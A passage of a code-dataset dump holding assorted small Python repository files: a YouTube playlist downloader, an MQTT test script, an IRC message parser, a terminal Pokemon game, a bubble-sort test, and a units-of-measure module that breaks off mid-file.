KeyboardInterrupt:\n log('Exiting ...')\n\nif __name__ == '__main__':\n\n if len(sys.argv) > 1:\n if sys.argv[1] == 'tunerproxy':\n TunerProxy.run()\n sys.exit(0)\n elif sys.argv[1] == 'appproxy':\n AppProxy.run()\n sys.exit(0)\n\n\n log(f'Usage:')\n log(f' {TunerProxy.usage()}')\n log(' OR')\n log(f' {AppProxy.usage()}')\n sys.exit(-1)\n\n","repo_name":"simeoncran/hdhomerun_proxy","sub_path":"message_codec.py","file_name":"message_codec.py","file_ext":"py","file_size_in_byte":12447,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"32"} +{"seq_id":"31510709194","text":"from yt_dlp import YoutubeDL\n\n\n\ndef download_playlist(playlist_url, limit=None):\n ydl_opts = {\n 'format': 'bestaudio/best',\n 'postprocessors': [{\n 'key': 'FFmpegExtractAudio',\n 'preferredcodec': 'mp3',\n 'preferredquality': '192',\n }],\n }\n if limit is not None:\n ydl_opts['playlistend'] = limit\n with YoutubeDL(ydl_opts) as ydl:\n ydl.download([playlist_url])\n \n\n\nplaylist_url = 'https://www.youtube.com/watch?v=V7xQd3yt590&list=RDV7xQd3yt590&start_radio=1&rv=V7xQd3yt590&t=3'\ndownload_playlist(playlist_url,limit=3)\n","repo_name":"ticofookfook/YT_Downloads","sub_path":"Yt_downloads.py","file_name":"Yt_downloads.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"} +{"seq_id":"38350141619","text":"import time\n\nimport paho.mqtt.client as paho\n#broker=\"broker.hivemq.com\"\ntry:\n\tbroker = \"192.168.2.41\"\n\n\tsub_list = [\"topic1\", \"topic2\"]\n\tglobal flag \n\tflag = True\n\t#define callback\n\tdef on_message(client, userdata, message):\n\t\tprint(type(message))\n\t\ttry:\n\t\t\t#print(type(client))\n\t\t\tprint(f\"client is {client._client_id}\")\n\t\texcept Exception as err:\n\t\t\tprint(err)\n\t\ttime.sleep(1)\n\t\tprint(\"HERE\")\n\t\t\n\t\tmessage = str(message.payload.decode(\"utf-8\"))\n\t\t\n\t\tprint(message=='bye', message, type(message))\n\t\tif message is 'bye' or message == '9':\n\t\t\tprint(\"Made it in\")\n\t\t\tglobal flag\n\t\t\tflag = False\n\t\t#print(\"Made it below 9 or bye\")\n\t\ttry:\n\t\t\tif int(message) % 2 == 0:\n\t\t\t\t#print(f\"trying to publish {message}\")\n\t\t\t\tclient.publish(sub_list[1], f\"{message} message recived on pi\")\n\t\texcept:\n\t\t\tprint(\"Message not int\")\n\t\tprint(\"received message =\",message)\n\n\tclient= paho.Client(\"client-002\")\n\t #create client object client1.on_publish = on_publish #assign function to callback client1.connect(broker,port)\n\t#establish connection client1.publish(\"house/bulb1\",\"on\")\n\t######Bind function to callback\n\tclient.on_message=on_message\n\t#####\n\tprint(\"connecting to broker \",broker)\n\tclient.connect(broker)#connect\n\tclient.loop_start() #start loop to process received messages\n\tprint(\"subscribing \")\n\tclient.subscribe(sub_list[0])#subscribe\n\ttime.sleep(2)\n\tcount = 0\n\tprint(\"publishing\")\n\twhile flag:\n\t\tclient.publish(sub_list[1],f\"this is the pi at {count}\")#publish\n\t\t#print(f\"flag is {flag}\")\n\t\tcount +=1\n\t\ttime.sleep(1)\n\tprint(\"turning off mqtt\")\n\ttime.sleep(1)\n\t#client.disconnect() #disconnect\nfinally:\n\tclient.disconnect()\n\tprint(\"closing\")\n\tclient.loop_stop() #stop loop\n\n","repo_name":"will-sloan/mqtt_comp","sub_path":"mqtt_script_pi.py","file_name":"mqtt_script_pi.py","file_ext":"py","file_size_in_byte":1669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"28425459246","text":"import re\nfrom enum import Enum\nfrom typing import Dict, Optional, TYPE_CHECKING\n\nfrom desertbot.channel import IRCChannel\nfrom desertbot.user import IRCUser\n\nif TYPE_CHECKING:\n from desertbot.desertbot import DesertBot\n\n\nclass TargetTypes(Enum):\n CHANNEL = 1\n USER = 2\n \n\nclass IRCMessage(object):\n def __init__(self, msgType: str, user: IRCUser, channel: Optional[IRCChannel], message: str, bot: 'DesertBot',\n metadata: Dict=None, tags: Dict=None):\n if metadata is None:\n metadata = {}\n self.metadata = metadata\n if tags is None:\n tags = {}\n self.tags = tags\n\n if isinstance(message, bytes):\n unicodeMessage = message.decode('utf-8', 'ignore')\n else: # Already utf-8?\n unicodeMessage = message\n self.type = msgType\n self.messageList = unicodeMessage.strip().split(' ')\n self.messageString = unicodeMessage\n self.user = user\n\n self.channel = None\n if channel is None:\n self.replyTo = self.user.nick\n self.targetType = TargetTypes.USER\n else:\n self.channel = channel\n # I would like to set this to the channel object but I would probably break functionality if I did :I\n self.replyTo = channel.name\n self.targetType = TargetTypes.CHANNEL\n\n self.command = ''\n self.parameters = ''\n self.parameterList = []\n\n if len(self.messageList) == 1 and self.messageList[0] == bot.commandChar:\n self.command = ''\n elif self.messageList[0].startswith(bot.commandChar) and self.messageList[0][:3].count(bot.commandChar) == 1:\n self.command = self.messageList[0][len(bot.commandChar):]\n if self.command == '':\n self.command = self.messageList[1]\n self.parameters = u' '.join(self.messageList[2:])\n else:\n self.parameters = u' '.join(self.messageList[1:])\n elif re.match('{}[:,]?'.format(re.escape(bot.nick)), self.messageList[0], re.IGNORECASE):\n if len(self.messageList) > 1:\n self.command = self.messageList[1]\n self.parameters = u' '.join(self.messageList[2:])\n self.command = self.command.lower()\n if self.parameters.strip():\n self.parameterList = self.parameters.split(' ')\n\n self.parameterList = [param for param in self.parameterList if param != '']\n\n if len(self.parameterList) == 1 and not self.parameterList[0]:\n self.parameterList = []\n","repo_name":"DesertBot/DesertBot","sub_path":"desertbot/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":2606,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"32"} +{"seq_id":"15043422276","text":"#!/usr/bin/env python\n\nimport matplotlib.pyplot as plt\nimport math\n\nstep_size = 40\nfraction_still = 0.225\nfraction_moving = 0.55\n\ndef stance_step_fwd(t):\n return 0.5 - t + fraction_still\n #if (t + 0.5) < fraction_still:\n #return swing_step_fwd(t) + 1.0\n #elif (t + 0.5) < fraction_still + fraction_moving:\n ##return -0.5 * math.cos(math.pi * ((t + 0.5) - fraction_still) / fraction_moving)\n ##scale = 10\n ##t = scale * (-0.5 + (t + 0.5 - fraction_still) / fraction_moving)\n ##minVal = sigmoid(-scale * 0.5)\n ##maxVal = sigmoid(scale * 0.5)\n \n ###print -2 * (t - fraction_still) / fraction_moving\n ##return (1 - 2 * m) * (0.5 - (sigmoid(t) - minVal) / (maxVal - minVal))\n #x = (t + 0.5 - fraction_still) / fraction_moving\n #m2 = 0.75# / fraction_moving\n #return -m2 * x + 0.25 + 0.125\n #else:\n #return swing_step_fwd(t) - 1.0\n \n\ndef sigmoid(t):\n return 1.0 / (1.0 + math.exp(-t))\n\ndef swing_step_fwd(t):\n if (t + 0.5) < fraction_still:\n return -0.5 - t + fraction_still\n if (t + 0.5) < fraction_still + fraction_moving:\n #return -0.5 * math.cos(math.pi * ((t + 0.5) - fraction_still) / fraction_moving)\n scale = 10\n t = scale * (-0.5 + (t + 0.5 - fraction_still) / fraction_moving)\n minVal = sigmoid(-scale * 0.5)\n maxVal = sigmoid(scale * 0.5)\n \n #print -2 * (t - fraction_still) / fraction_moving\n return (1.0 + fraction_still * 2) * (-0.5 + (sigmoid(t) - minVal) / (maxVal - minVal)) + 0.5 + fraction_still\n else:\n return 1.5 - t + fraction_still\n\nnumVals = 1000\nts = [x / float(numVals) - 0.5 for x in range(numVals)]\n\nleft = []\nright = []\nxs = []\n\nright.extend(map(stance_step_fwd,ts))\nleft.extend(map(swing_step_fwd,ts))\nxs.extend(ts)\n\nright.extend(map(swing_step_fwd,ts))\nleft.extend(map(stance_step_fwd,ts))\nxs.extend([t + 1.0 for t in ts])\n\nright.extend(map(stance_step_fwd,ts))\nleft.extend(map(swing_step_fwd,ts))\nxs.extend([t + 2.0 for t in ts])\n\nright = [step_size * y for y in right]\nleft = [step_size * y for y in left]\n\noffset = [abs(l - r) for l,r in zip(left,right)]\n\nplt.plot(xs,left)\nplt.plot(xs,right)\nplt.plot(xs,offset)\nplt.show()\n","repo_name":"LARG/robotics-2018","sub_path":"tools/testStep.py","file_name":"testStep.py","file_ext":"py","file_size_in_byte":2130,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"32"} +{"seq_id":"42339938858","text":"from pokemon import *\nfrom pessoa import *\nfrom time import sleep\nfrom pickle import dump, load # biblioteca que transforma qualquer objeto em bytes\n\n\ndef escolher_pokemon_inicial(player):\n print(\"Olá {}, você poderá escolher agora o Pokemon que irá lhe acompanhar nessa jornada\".format(player))\n\n pikachu = PokemonEletrico(\"Pikachu\", level=1)\n charmander = PokemonFogo(\"Charmander\", level=1)\n squirtle = PokemonAgua(\"Squirtle\", level=1)\n\n print(\"Você possui três 3 escolhas:\")\n print(\"1 - \", pikachu)\n print(\"2 - \", charmander)\n print(\"3 - \", squirtle)\n\n while True:\n escolha = input(\"Escolha o seu Pokemon: \")\n\n if escolha == \"1\":\n player.capturar(pikachu)\n break\n elif escolha == \"2\":\n player.capturar(charmander)\n break\n elif escolha == \"3\":\n player.capturar(squirtle)\n break\n else:\n print(\"Escolha inválida!\")\n\n\ndef salvar_jogo(player):\n try:\n with open(\"database.db\", \"wb\") as arquivo:\n dump(player, arquivo) # joga o player dentro de arquivo, como bytes\n print(\"Jogo salvo com sucesso!!!\")\n except Exception as error:\n print(\"Erro ao salvar o jogo: {}\".format(error))\n\n\ndef carregar_jogo():\n try:\n with open(\"database.db\", \"rb\") as arquivo:\n player = load(arquivo)\n print(\"Loading feito com sucesso!!!\")\n return player\n except Exception as error:\n print(\"Save não encontrado.\")\n\n\nif __name__ == \"__main__\":\n print(\"-------------------------------------------------\")\n print(\" Bem-vindo ao game Pokemon RPG de terminal \")\n print(\"-------------------------------------------------\")\n\n player = carregar_jogo()\n\n if not player: # Se não tiver player, vai para criar um, primeira batalha, etc.\n\n nome = input(\"Olá, qual é o seu nome: \")\n\n player = Player(nome)\n print(\"Olá {}, esse é um mundo habitado por Pokemons. Sua missão é se tornar um mestre dos pokemons.\".format(player))\n print(\"Capture o máximo de pokemons que você conseguir e lute com seus amigos\")\n player.mostrar_dinheiro()\n\n if player.pokemons:\n print(\"Já notei que você tem alguns pokemons\")\n player.mostrar_pokemons()\n else:\n print(\"Você não tem nenhum pokemon. Escolha um\")\n escolher_pokemon_inicial(player)\n\n print(\"Pronto, agora você poderá enfrentar seu arqui-rival desde o jardim da infância: Gary\")\n gary = Inimigo(nome=\"Gary\", pokemons=[PokemonAgua(\"Squirtle\", level=1)])\n player.batalhar(gary)\n\n salvar_jogo(player) # ao fim da primeira batalha, salva o jogo\n\n # Se já existir um player, vai para o menu principal\n while True:\n print(\"-----\" * 10)\n print(\"O que você deseja fazer?\")\n print('''1 - Explorar e tentar encontrar pokemons \\n2 - Lutar com um inimigo \\n3 - Ver pokemons \\n4 - Ver saldo \\n0 - Sair do jogo''')\n escolha = input(\"Escolha uma opção: \")\n\n if escolha == \"0\":\n print(\"Fechando o jogo...\")\n sleep(1)\n break\n elif escolha == \"1\":\n player.explorar()\n salvar_jogo(player)\n elif escolha == \"2\":\n inimigo_aleatorio = Inimigo()\n player.batalhar(inimigo_aleatorio)\n salvar_jogo(player)\n elif escolha == \"3\":\n player.mostrar_pokemons()\n elif escolha == \"4\":\n player.mostrar_dinheiro()\n else:\n print(\"Opção inválida!!!\")\n","repo_name":"isaias0rt0n/pokemon-game","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3624,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25278635470","text":"# -*- coding: utf-8 -*-\nfrom setuptools import setup\nimport os\n\n# Utility function to read the README file.\n# Used for the long_description. It's nice, because now 1) we have a top level\n# README file and 2) it's easier to type in the README file than to put a raw\n# string in below ...\ndef read(fname):\n return open(os.path.join(os.path.dirname(__file__), fname)).read()\n\n\nsetup(\n name='django-profiler',\n version='2.0.0',\n description='util for profiling python code mainly in django projects, but can be used also on ordinary python code',\n long_description=read('README.rst'),\n author=u'Vladimír Gorej',\n author_email='gorej@codescale.net',\n url='http://www.codescale.net/en/community#django-profiler',\n download_url='http://github.com/CodeScaleInc/django-profiler/tarball/master',\n license='BSD',\n keywords = 'django profiler profiling code profile',\n packages=['profiling'],\n platforms='any',\n classifiers=[\n 'Development Status :: 5 - Production/Stable',\n 'Environment :: Console',\n 'Environment :: Web Environment',\n 'Intended Audience :: Developers',\n 'Intended Audience :: System Administrators',\n 'License :: OSI Approved :: BSD License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Topic :: Utilities',\n 'Topic :: Software Development :: Debuggers',\n 'Topic :: Software Development :: Bug Tracking'\n ],\n #test_suite=''\n)","repo_name":"char0n/django-profiler","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1490,"program_lang":"python","lang":"en","doc_type":"code","stars":57,"dataset":"github-code","pt":"32"} +{"seq_id":"23883278577","text":"import allure\nimport pytest\nfrom typing import List\nfrom src.main.java.testAlgo.yang_hu.bubble_sorting import bubble_sorting\n\n\ntest_data = [\n ([60, 50, 95, 80, 70], [50, 60, 70, 80, 95]),\n ([95, 50, 60, 80, 70], [50, 60, 70, 80, 95]),\n ([60, 70, 95, 80, 50], [50, 60, 70, 80, 95]),\n ([95, 80, 70, 60, 50], [50, 60, 70, 80, 95]),\n ([50, 60, 70, 80, 95], [50, 60, 70, 80, 95]),\n]\n\n\n@allure.feature(\"Yang Hu\")\n@allure.story(\"Bubble sorting\")\n@pytest.mark.parametrize(\"input_array,expected_result\", test_data)\ndef test_bubble_sorting(input_array: List[int], expected_result: List[int]):\n assert expected_result == bubble_sorting(input_array)\n","repo_name":"apetrovskiy/testAlgo","sub_path":"src/test/java/testAlgo/yang_hu/test_bubble_sorting.py","file_name":"test_bubble_sorting.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"16678207728","text":"\r\nimport random\r\na = int(random.randint(0,100))\r\nguessNum = 0\r\n\r\nwhile guessNum < 7:\r\n print(\"What's your guess?\")\r\n guess = int(input())\r\n\r\n guessNum = guessNum + 1\r\n \r\n if a>guess:\r\n print(\"Too low\")\r\n elif a sides[2]:\n res += 1\nprint(res)\n\n","repo_name":"tcourtai/AdventOfCode_2016","sub_path":"AdventOfCode2_1/AoC_3_1.py","file_name":"AoC_3_1.py","file_ext":"py","file_size_in_byte":219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"35645206835","text":"\"\"\" TEDLium dataset handler\n\"\"\"\nimport os\nimport shutil\nimport subprocess\nimport unicodedata\n\nfrom tqdm import tqdm\n\nimport utils\nfrom corpus import Corpus\n\n\nclass TEDLIUM(Corpus):\n\n __version__ = 'v2'\n\n DATASET_URLS = {\n \"train\": [\"http://www.openslr.org/resources/19/TEDLIUM_release2.tar.gz\"],\n \"val\": [\"http://www.openslr.org/resources/19/TEDLIUM_release2.tar.gz\"],\n \"test\": [\"http://www.openslr.org/resources/19/TEDLIUM_release2.tar.gz\"]\n }\n\n def __init__(self,\n target_dir='ted_dataset',\n min_duration=1,\n max_duration=15,\n fs=16000,\n name='ted'):\n super().__init__(\n TEDLIUM.DATASET_URLS,\n target_dir,\n min_duration=min_duration,\n max_duration=max_duration,\n fs=fs,\n name=name)\n\n def process_audio(self, audio_path, wav_path):\n shutil.move(audio_path, wav_path)\n\n def get_data(self, root_dir, set_type):\n\n if set_type == 'val':\n set_type = 'dev'\n\n root_dir = os.path.join(root_dir, 'TEDLIUM_release2', set_type)\n\n data = []\n entries = os.listdir(os.path.join(root_dir, 'sph'))\n for sph_file in tqdm(entries, total=len(entries)):\n speaker_name = sph_file.split('.sph')[0]\n\n sph_path = os.path.join(root_dir, 'sph', sph_file)\n stm_path = os.path.join(root_dir, 'stm', '{}.stm'.format(speaker_name))\n\n assert os.path.exists(sph_path) and os.path.exists(stm_path)\n\n all_utterances = self._get_utterances_from_stm(stm_path)\n all_utterances = filter(self._filter_short_utterances, all_utterances)\n\n for utterance_id, utterance in enumerate(all_utterances):\n cut_audio_path = os.path.join(\n root_dir, 'sph', '{}_{}.wav'.format(utterance['filename'], str(utterance_id)))\n self._cut_utterance(sph_path, cut_audio_path, utterance['start_time'],\n utterance['end_time'])\n\n data.append((cut_audio_path, utterance['transcript']))\n\n return data\n\n def _get_utterances_from_stm(self, stm_file):\n \"\"\" Return list of entries containing phrase and its start/end timings\n \"\"\"\n results = []\n with open(stm_file, 'r') as f:\n for stm_line in f:\n tokens = stm_line.split()\n start_time = float(tokens[3])\n end_time = float(tokens[4])\n filename = tokens[0]\n transcript = unicodedata.normalize('NFKD',\n ' '.join(t for t in tokens[6:]).strip()).encode(\n 'utf-8', 'ignore').decode('utf-8', 'ignore')\n if transcript != 'ignore_time_segment_in_scoring':\n results.append({\n 'start_time': start_time,\n 'end_time': end_time,\n 'filename': filename,\n 'transcript': transcript\n })\n return results\n\n def _filter_short_utterances(self, utterance_info, min_len_sec=1.0):\n return utterance_info[\"end_time\"] - utterance_info[\"start_time\"] > min_len_sec\n\n def process_transcript(self, root_dir, transcript_path, audio_path):\n return transcript_path\n\n def _cut_utterance(self, audio_path, target_audio_path, start_time, end_time):\n cmd = \"sox {} -r {} -b 16 -c 1 {} trim {} = {}\".format(\n audio_path, self.fs, target_audio_path, start_time, end_time)\n\n ret_code = subprocess.call(cmd, shell=True)\n\n if ret_code < 0:\n raise RuntimeError('sox was terminated by signal {}'.format(ret_code))\n\n\nif __name__ == \"__main__\":\n parser = utils.get_argparse(os.path.join(os.path.split(os.path.abspath(__file__))[0]))\n args = parser.parse_args()\n\n ted = TEDLIUM(\n target_dir=args.target_dir,\n fs=args.fs,\n max_duration=args.max_duration,\n min_duration=args.min_duration)\n manifest_paths = ted.download(args.files_to_download)\n\n for manifest_path in manifest_paths:\n print('Manifest created at {}'.format(manifest_path))\n","repo_name":"igormq/speech2text","sub_path":"data/ted.py","file_name":"ted.py","file_ext":"py","file_size_in_byte":4285,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"32"} +{"seq_id":"1677479220","text":"\"\"\"Module to handle dimensional analysis\"\"\"\nfrom copy import deepcopy\nfrom math import floor, log10, pi\nfrom typing import Tuple\n\nprefixes = {key-10: value for key, value in enumerate('qryzafpnµm kMGTPEZYRQ')}\nprefixes[0] = '' # set up prefix dict\ntemperatures = {\n\t'celsius': ('C', 1, -273.15),\n\t'delisle': ('D', -3/2, 559.725),\n\t'fahrenheit': ('F', 9/5, -459.67),\n\t'kelvin': ('K', 1, 0),\n\t'newton': ('N', 1/3, -91.05),\n\t'planck': ('T_P', 7.058119e-33, 0),\n\t'rankine': ('R', 9/5, 0),\n\t'reaumur': ('Ré', 4/5, -218.52),\n\t'romer': ('Rø', 21/40, -135.90375),\n\t'urist': ('U', 9/5, 9508.33),\n}\n\n\ndef get_si(value: float) -> Tuple[float, str]:\n\t\"\"\"Get SI prefix and adjusted value\"\"\"\n\tif value == 0:\n\t\treturn 0, prefixes[0]\n\tindex = floor(log10(value)/3)\n\tindex = max(min(prefixes), min(max(prefixes), index))\n\tnew_value = value / 10**(3*index)\n\treturn new_value, prefixes[index]\n\n\n# https://stackoverflow.com/a/10854034/2579798\ndef round_time(dt = None, round_to: int = 1):\n\t\"\"\"Round a datetime object to any time lapse in seconds\n\tdt : datetime.datetime object, default now.\n\tround_to : Closest number of seconds to round to, default 1 second.\n\tAuthor: Thierry Husson 2012 - Use it as you want but don't blame me.\n\t\"\"\"\n\timport datetime\n\tif dt is None:\n\t\tdt = datetime.datetime.now()\n\tseconds = (dt.replace(tzinfo=None) - dt.min).seconds\n\trounding = (seconds+round_to/2) // round_to * round_to\n\treturn dt + datetime.timedelta(0, rounding-seconds, -dt.microsecond)\n\n\ndef pretty_dim(multidim, rounding: int=3) -> str:\n\t\"\"\"Prettify dim\"\"\"\n\tval, unit = str(multidim).split(' ')\n\tval = round(float(val), rounding)\n\tif val % 1 == 0:\n\t\tval = int(val)\n\treturn f'{val} {unit}'\n\n\nclass Dimension:\n\t\"\"\"Abstract dimension object\"\"\"\n\tdef __init__(self, value, *tags):\n\t\tself.value = value\n\t\tself.tags = set(tags)\n\n\t# properties\n\t@property\n\tdef copy(self):\n\t\t\"\"\"Returns a deep copy of this object\"\"\"\n\t\treturn deepcopy(self)\n\n\t@property\n\tdef multi(self):\n\t\treturn Multidimension(self.value, {type(self): 1}, *self.tags)\n\n\t# double underscore methods\n\tdef __abs__(self):\n\t\treturn type(self)(abs(self.value), *self.tags)\n\n\tdef __add__(self, other):\n\t\tassert isinstance(self, type(other))\n\t\treturn type(self)(self.value+other.value, *self.tags)\n\n\tdef __bool__(self) -> bool:\n\t\treturn bool(self.value)\n\n\tdef __complex__(self) -> complex:\n\t\treturn complex(self.value)\n\n\tdef __eq__(self, other) -> bool:\n\t\tassert isinstance(self, type(other))\n\t\treturn self.value == other.value\n\n\tdef __float__(self) -> float:\n\t\treturn float(self.value)\n\n\tdef __hash__(self) -> int:\n\t\treturn hash(self.value)\n\n\tdef __int__(self) -> int:\n\t\treturn int(self.value)\n\n\tdef __le__(self, other) -> bool:\n\t\tassert isinstance(self, type(other))\n\t\treturn self.value <= other.value\n\n\tdef __lt__(self, other) -> bool:\n\t\tassert isinstance(self, type(other))\n\t\treturn self.value < other.value\n\n\tdef __mul__(self, other): # returns either type(self) or Multidimension\n\t\tif isinstance(other, Dimension):\n\t\t\treturn self.multi * other.multi\n\t\tif isinstance(other, Multidimension):\n\t\t\treturn self.multi * other\n\t\treturn type(self)(self.value*other, *self.tags)\n\n\tdef __neg__(self):\n\t\treturn type(self)(-self.value, *self.tags)\n\n\tdef __pos__(self):\n\t\treturn self\n\n\tdef __pow__(self, other):\n\t\treturn self.multi ** other\n\n\tdef __repr__(self) -> str:\n\t\treturn f'{type(self).__name__}({self.value}, *{self.tags})'\n\n\tdef __rmul__(self, other):\n\t\treturn self * other\n\n\tdef __rtruediv__(self, other):\n\t\treturn other / self.multi\n\n\tdef __sub__(self, other):\n\t\tassert isinstance(self, type(other))\n\t\treturn type(self)(self.value-other.value, *self.tags)\n\n\tdef __truediv__(self, other): # returns either type(self) or Multidimension\n\t\tif isinstance(other, Dimension):\n\t\t\tif isinstance(self, type(other)):\n\t\t\t\treturn self.value / other.value\n\t\t\treturn self.multi / other.multi\n\t\tif isinstance(other, Multidimension): # call rtruediv of Multidimension\n\t\t\treturn self.multi / other\n\t\treturn type(self)(self.value/other, *self.tags)\n\n\nclass Length(Dimension):\n\t# properties\n\t@property\n\tdef astro(self) -> str:\n\t\t\"\"\"Get astronomically-used units\"\"\"\n\t\tx = self.value\n\t\tLD = 3.84402e8\n\t\tau = 1.495978707e11\n\t\tly = 9.4607304725808e15\n\t\tif self.value < au:\n\t\t\treturn str(x/LD) + ' LD'\n\t\tif self.value < ly:\n\t\t\treturn str(x/au) + ' au'\n\t\treturn '{} {}ly'.format(*get_si(x/ly))\n\n\t@property\n\tdef imperial(self) -> str:\n\t\t\"\"\"Get imperial units\"\"\"\n\t\tx = self.value\n\t\tinch = 2.54e-2\n\t\tft = 0.3048\n\t\tyd = 0.9144\n\t\tmi = 1609.344\n\t\tif self.value < ft:\n\t\t\treturn str(x/inch) + ' in'\n\t\tif self.value < yd:\n\t\t\treturn str(x/ft) + ' ft'\n\t\tif self.value < mi:\n\t\t\treturn str(x/yd) + ' yd'\n\t\treturn str(x/mi) + ' mi'\n\n\t# double underscore methods\n\tdef __str__(self) -> str:\n\t\tx = self.value\n\t\tif x < 0:\n\t\t\treturn '-' + str(-self)\n\t\tif 'imperial' in self.tags:\n\t\t\treturn self.imperial\n\t\tif 'astro' in self.tags and 3.84402e8 < x:\n\t\t\treturn self.astro\n\t\treturn '{} {}m'.format(*get_si(x))\n\n\nclass Mass(Dimension):\n\t# properties\n\t@property\n\tdef astro(self) -> str:\n\t\t\"\"\"Get astronomically-used units\"\"\"\n\t\tx = self.value\n\t\tm_m = 7.342e22\n\t\tm_e = 5.97237e24\n\t\tm_j = 1.8982e27\n\t\tm_s = 1.98847e30\n\t\tif self.value < m_e:\n\t\t\treturn str(x/m_m) + ' Lunar Masses'\n\t\tif self.value < m_j:\n\t\t\treturn str(x/m_e) + ' Earth Masses'\n\t\tif self.value < m_s:\n\t\t\treturn str(x/m_j) + ' Jupiter Masses'\n\t\treturn str(x/m_s) + ' Solar Masses'\n\n\t@property\n\tdef imperial(self) -> str:\n\t\t\"\"\"Get imperial units\"\"\"\n\t\tx = self.value\n\t\tlb = .45359237\n\t\toz = lb / 12\n\t\tif self.value < lb:\n\t\t\treturn str(x/oz) + ' oz'\n\t\treturn str(x/lb) + ' lb'\n\n\t# double underscore methods\n\tdef __str__(self) -> str:\n\t\tx = self.value\n\t\tif x < 0:\n\t\t\treturn '-' + str(-self)\n\t\tif 'imperial' in self.tags:\n\t\t\treturn self.imperial\n\t\tif 1e23 < x and 'astro' in self.tags:\n\t\t\treturn self.astro\n\t\treturn '{} {}g'.format(*get_si(x*1000))\n\n\nclass Time(Dimension):\n\t# properties\n\t@property\n\tdef imperial(self) -> str:\n\t\t\"\"\"Get imperial units\"\"\"\n\t\tx = self.value\n\t\tminute = 60\n\t\th = 60*minute\n\t\td = 24*h\n\t\tyr = 365.2425*d\n\t\tif self.value < h:\n\t\t\treturn str(x/minute) + ' min'\n\t\tif self.value < d:\n\t\t\treturn str(x/h) + ' h'\n\t\tif self.value < yr:\n\t\t\treturn str(x/d) + ' d'\n\t\treturn '{} {}yr'.format(*get_si(x/yr))\n\n\t# double underscore methods\n\tdef __str__(self) -> str:\n\t\tx = self.value\n\t\tif x < 0:\n\t\t\treturn '-' + str(-self)\n\t\tif 'imperial' in self.tags and 60 <= x:\n\t\t\treturn self.imperial\n\t\treturn '{} {}s'.format(*get_si(x))\n\n\nclass Temperature(Dimension):\n\t# double underscore methods\n\tdef __str__(self) -> str:\n\t\tfor name, (sym, scalar, offset) in temperatures.items():\n\t\t\tif name in self.tags:\n\t\t\t\treturn '{} {}{}'.format(scalar * self.value + offset, '°' if offset else '', sym)\n\t\treturn '{} K'.format(self.value)\n\n\nclass Current(Dimension):\n\t# double underscore methods\n\tdef __str__(self) -> str:\n\t\tx = self.value\n\t\tif x < 0:\n\t\t\treturn '-' + str(-self)\n\t\treturn '{} {}A'.format(*get_si(x))\n\n\nclass Angle(Dimension):\n\t# properties\n\t@property\n\tdef degrees(self) -> str:\n\t\t\"\"\"Get value in degrees, arcminutes, and arcseconds\"\"\"\n\t\tx = self.value\n\t\tdeg = pi/180\n\t\tarcmin = deg / 60\n\t\tarcsec = arcmin / 60\n\t\tif deg < self.value:\n\t\t\treturn str(x/deg) + '°'\n\t\tif arcmin < self.value:\n\t\t\treturn str(x/arcmin) + '′'\n\t\tif arcsec < self.value:\n\t\t\treturn str(x/arcsec) + '″'\n\t\treturn '{} {}as'.format(*get_si(x/arcsec))\n\n\t# double underscore methods\n\tdef __str__(self) -> str:\n\t\tx = self.value\n\t\tif x < 0:\n\t\t\treturn '-' + str(-self)\n\t\tif 'deg' in self.tags:\n\t\t\treturn self.degrees\n\t\treturn '{} {}rad'.format(*get_si(x))\n\n\nquantities = [\n\t({Length: 1, Time: -2}, 'Acceleration', 'm/s^2'),\n\t({Length: 2, Mass: 1, Time: -1}, 'Angular Momentum', 'N*m*s'),\n\t({Length: 2}, 'Area', 'm^2'),\n\t({Length: -3, Mass: 1}, 'Density', 'kg/m^3'),\n\t({Length: 2, Mass: 1, Time: -2}, 'Energy', 'J'),\n\t({Length: 1, Mass: 1, Time: -2}, 'Force', 'N'),\n\t({Length: 1, Mass: 1, Time: -1}, 'Momentum', 'N*s'),\n\t({Time: -1}, 'Frequency', 'Hz'),\n\t({Length: 2, Mass: 1, Time: -3}, 'Power', 'W'),\n\t({Length: -1, Mass: 1, Time: -2}, 'Pressure', 'Pa'),\n\t({Length: 1, Time: -1}, 'Speed', 'm/s'),\n\t({Length: 3}, 'Volume', 'm^3'),\n\t# w/ temperature\n\t({Length: 2, Mass: 1, Temperature: -1, Time: -2}, 'Entropy', 'J/K'),\n\t# w/ current\n\t({Current: 1, Time: 1}, 'Electric Charge', 'C'),\n\t({Current: 2, Length: -2, Mass: -1, Time: 4}, 'Electrical Capacitance', 'F'),\n\t({Current: 2, Length: -2, Mass: -1, Time: 3}, 'Electrical Conductance', 'S'),\n\t({Current: -2, Length: 2, Mass: 1, Time: -2}, 'Electrical Inductance', 'H'),\n\t({Current: -2, Length: 2, Mass: 1, Time: -3}, 'Electrical Resistance', 'Ω'),\n\t({Current: -1, Length: 2, Mass: 1, Time: -2}, 'Magnetic Flux', 'Wb'),\n\t({Current: -1, Mass: 1, Time: -2}, 'Magnetic Induction', 'T'),\n\t({Current: -1, Length: 2, Mass: 1, Time: -3}, 'Voltage', 'V'),\n]\n\n\nclass Multidimension:\n\tdef __init__(self, value: float, dimensions: dict, *tags):\n\t\tself.value = value\n\t\tself.dimensions = dimensions # type dict Class -> int\n\t\tself.tags = set(tags)\n\n\t# properties\n\t@property\n\tdef clean(self):\n\t\t\"\"\"Delete units with 0\"\"\"\n\t\tnew = self.copy\n\t\tnew.dimensions = {key: value for key, value in self.dimensions.items() if value}\n\t\treturn new\n\n\t@property\n\tdef copy(self):\n\t\t\"\"\"Returns a deep copy of 